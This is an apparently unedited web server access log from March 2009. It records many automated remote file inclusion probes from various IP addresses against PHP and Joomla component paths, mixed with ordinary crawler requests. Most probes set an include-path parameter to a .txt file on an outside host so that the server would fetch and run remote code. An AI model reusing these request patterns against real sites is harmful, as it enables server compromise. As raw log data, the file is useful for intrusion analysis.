190.144.44.36 - - [12/Mar/2009:23:16:35 -0500] "GET /logs/access_log.1212192000//app.lib/product.control/core.php/functions.php?set_depth=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
70.38.11.214 - - [12/Mar/2009:23:17:07 -0500] "GET /logs/access_log.1217289600%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
190.144.44.36 - - [12/Mar/2009:23:17:08 -0500] "GET /logs/access_log.1212278400//app.lib/product.control/core.php/functions.php?set_depth=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
91.52.190.23 - - [12/Mar/2009:23:17:09 -0500] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.52.190.23 - - [12/Mar/2009:23:17:09 -0500] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.11.214 - - [12/Mar/2009:23:17:19 -0500] "GET /logs/access_log.1217289600%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:17:24 -0500] "GET /logs/access_log.1217289600%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
91.52.190.23 - - [12/Mar/2009:23:17:41 -0500] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.52.190.23 - - [12/Mar/2009:23:17:41 -0500] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
208.115.111.242 - - [12/Mar/2009:23:18:50 -0500] "GET /logs/access_log.1216080000 HTTP/1.1" 200 427909 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
210.118.170.11 - - [12/Mar/2009:23:18:52 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 200 122044 "-""libwww-perl/5.805"
208.115.111.242 - - [12/Mar/2009:23:19:12 -0500] "GET /logs/access_log.1216512000 HTTP/1.1" 200 582335 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [12/Mar/2009:23:19:24 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 200 924103 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [12/Mar/2009:23:19:37 -0500] "GET /memorial/index.htm HTTP/1.1" 200 817 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [12/Mar/2009:23:19:42 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [12/Mar/2009:23:19:46 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [12/Mar/2009:23:19:52 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2645 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [12/Mar/2009:23:19:58 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2286 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [12/Mar/2009:23:20:03 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
70.38.71.140 - - [12/Mar/2009:23:21:47 -0500] "GET /logs/access_log.1214956800/index.php?act=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
70.38.71.140 - - [12/Mar/2009:23:21:47 -0500] "GET /index.php?act=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
70.38.71.140 - - [12/Mar/2009:23:21:47 -0500] "GET /logs/index.php?act=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.16.172.4 - - [12/Mar/2009:23:22:02 -0500] "GET /logs//common/db.php?commonpath=http://t24ever.com/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
61.16.172.4 - - [12/Mar/2009:23:22:03 -0500] "GET //common/db.php?commonpath=http://t24ever.com/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
61.16.172.4 - - [12/Mar/2009:23:22:25 -0500] "GET /logs//common/db.php?commonpath=http://t24ever.com/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
61.16.172.4 - - [12/Mar/2009:23:22:25 -0500] "GET //common/db.php?commonpath=http://t24ever.com/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
211.43.205.222 - - [12/Mar/2009:23:23:49 -0500] "GET /logs/access_log.1216512000%20%20/png.php?include_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.205.222 - - [12/Mar/2009:23:23:49 -0500] "GET /png.php?include_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
211.43.205.222 - - [12/Mar/2009:23:23:49 -0500] "GET /logs/png.php?include_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
206.123.122.148 - - [12/Mar/2009:23:25:15 -0500] "GET /logs/access_log.1214956800/ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
211.43.205.222 - - [12/Mar/2009:23:25:25 -0500] "GET /logs/access_log.1216512000/png.php?include_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.123.122.148 - - [12/Mar/2009:23:26:02 -0500] "GET /logs/access_log.1206489600/ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
72.30.142.163 - - [12/Mar/2009:23:26:14 -0500] "GET /logs/access_log.1162080000 HTTP/1.0" 200 191993 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.123.122.148 - - [12/Mar/2009:23:26:54 -0500] "GET /logs/access_log.1205193600/ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
62.128.131.80 - - [12/Mar/2009:23:27:48 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:23:27:49 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:23:29:07 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:23:29:07 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
74.213.164.118 - - [12/Mar/2009:23:30:12 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.213.164.118 - - [12/Mar/2009:23:30:12 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.213.164.118 - - [12/Mar/2009:23:30:12 -0500] "GET /logs/access_log.1216944000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.213.164.118 - - [12/Mar/2009:23:31:32 -0500] "GET /logs/access_log.1211328000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
70.38.11.214 - - [12/Mar/2009:23:32:24 -0500] "GET /logs/access_log.1216771200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:32:24 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:32:24 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
72.30.142.163 - - [12/Mar/2009:23:32:31 -0500] "GET /logs/access_log.1181606400 HTTP/1.0" 200 156333 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.38.11.214 - - [12/Mar/2009:23:32:58 -0500] "GET /logs/access_log.1216771200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:32:58 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:32:58 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.814"
77.79.246.80 - - [12/Mar/2009:23:33:00 -0500] "GET /logs/access_log.1211760000/mvcw.php?vwar_root=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
77.79.246.80 - - [12/Mar/2009:23:33:01 -0500] "GET /mvcw.php?vwar_root=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.808"
77.79.246.80 - - [12/Mar/2009:23:33:01 -0500] "GET /logs/mvcw.php?vwar_root=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
70.38.11.214 - - [12/Mar/2009:23:33:05 -0500] "GET /logs/access_log.1216771200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:33:05 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:33:05 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.814"
148.202.29.8 - - [12/Mar/2009:23:34:48 -0500] "GET /logs/access_log.1214352000/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
77.79.246.80 - - [12/Mar/2009:23:36:45 -0500] "GET /logs/access_log.1210291200/mvcw.php?vwar_root=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
82.226.108.61 - - [12/Mar/2009:23:38:45 -0500] "GET /logs/access_log.1219968000/admin/inc/include.php?language=0&lang_settings[0][1]=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.813"
200.203.126.15 - - [12/Mar/2009:23:43:55 -0500] "GET /logs/access_log.1216944000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
200.203.126.15 - - [12/Mar/2009:23:43:55 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
200.203.126.15 - - [12/Mar/2009:23:43:56 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
67.76.163.60 - - [12/Mar/2009:23:44:01 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:23:44:01 -0500] "GET /logs/access_log.1219536000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:23:44:01 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:23:45:11 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:23:45:11 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:23:45:11 -0500] "GET /logs/access_log.1219536000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
200.203.126.15 - - [12/Mar/2009:23:46:10 -0500] "GET /logs/access_log.1211328000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
70.38.11.214 - - [12/Mar/2009:23:51:03 -0500] "GET /logs/access_log.1216944000//components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:51:03 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:51:03 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:51:51 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:51:51 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:51:51 -0500] "GET /logs/access_log.1216944000//components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:51:58 -0500] "GET /logs/access_log.1216944000//components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:51:58 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:23:51:58 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
210.18.123.42 - - [12/Mar/2009:23:52:10 -0500] "GET /logs//common/db.php?commonpath=http://t24ever.com/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
210.18.123.42 - - [12/Mar/2009:23:52:12 -0500] "GET //common/db.php?commonpath=http://t24ever.com/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.213.164.118 - - [12/Mar/2009:23:55:13 -0500] "GET /logs/index.php?contenido=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.213.164.118 - - [12/Mar/2009:23:55:13 -0500] "GET /index.php?contenido=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.213.164.118 - - [12/Mar/2009:23:55:13 -0500] "GET /logs/access_log.1218758400/index.php?contenido=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.202.2.220 - - [12/Mar/2009:23:55:23 -0500] "GET //?path%5Bdocroot%5D=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
211.202.2.220 - - [12/Mar/2009:23:55:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 122044 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
211.202.2.220 - - [12/Mar/2009:23:57:52 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
211.202.2.220 - - [12/Mar/2009:23:57:53 -0500] "GET /logs/access_log.1217116800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
211.202.2.220 - - [12/Mar/2009:23:57:53 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
211.202.2.220 - - [12/Mar/2009:23:57:55 -0500] "GET /logs/access_log.1210550400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
211.202.2.220 - - [12/Mar/2009:23:59:14 -0500] "GET /logs/access_log.1217116800/errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.202.2.220 - - [12/Mar/2009:23:59:14 -0500] "GET /errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.202.2.220 - - [12/Mar/2009:23:59:14 -0500] "GET /logs/errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.203.126.15 - - [13/Mar/2009:00:00:12 -0500] "GET /logs/index.php?contenido=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.203.126.15 - - [13/Mar/2009:00:00:13 -0500] "GET /index.php?contenido=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.106.235.128 - - [13/Mar/2009:00:00:26 -0500] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.0" 404 294 "-""libwww-perl/5.53"
217.106.235.128 - - [13/Mar/2009:00:00:27 -0500] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.0" 404 289 "-""libwww-perl/5.53"
211.202.2.220 - - [13/Mar/2009:00:00:37 -0500] "GET /logs/access_log.1219536000/errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
148.202.29.8 - - [13/Mar/2009:00:01:04 -0500] "GET /logs/access_log.1211155200/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
211.202.2.220 - - [13/Mar/2009:00:01:06 -0500] "GET /logs/access_log.1217116800%20/errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
74.213.164.118 - - [13/Mar/2009:00:01:20 -0500] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.213.164.118 - - [13/Mar/2009:00:01:20 -0500] "GET //administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.213.164.118 - - [13/Mar/2009:00:01:20 -0500] "GET /logs/access_log.1219536000//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.213.164.118 - - [13/Mar/2009:00:02:03 -0500] "GET /logs/access_log.1216684800//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
200.203.126.15 - - [13/Mar/2009:00:05:30 -0500] "GET /logs/access_log.1219536000//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
200.203.126.15 - - [13/Mar/2009:00:05:30 -0500] "GET //administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
200.203.126.15 - - [13/Mar/2009:00:05:31 -0500] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
216.15.161.2 - - [13/Mar/2009:00:05:52 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:05:52 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:05:52 -0500] "GET /logs/access_log.1219536000%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:05:55 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:05:55 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:05:55 -0500] "GET /logs/access_log.1219536000%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:06:56 -0500] "GET /logs/access_log.1216944000%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:07:05 -0500] "GET /logs/access_log.1216944000%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
200.203.126.15 - - [13/Mar/2009:00:07:26 -0500] "GET /logs/access_log.1216684800//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
200.203.126.15 - - [13/Mar/2009:00:11:08 -0500] "GET //administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
65.55.208.124 - - [13/Mar/2009:00:11:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [13/Mar/2009:00:11:53 -0500] "GET /logs/access_log.1217808000 HTTP/1.1" 200 1081344 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.213.164.118 - - [13/Mar/2009:00:12:46 -0500] "GET /logs/access_log.1212192000//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.12.13.152 - - [13/Mar/2009:00:13:06 -0500] "GET /logs/access_log.1217289600%20%20/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:00:13:06 -0500] "GET /?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:00:13:08 -0500] "GET /logs/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
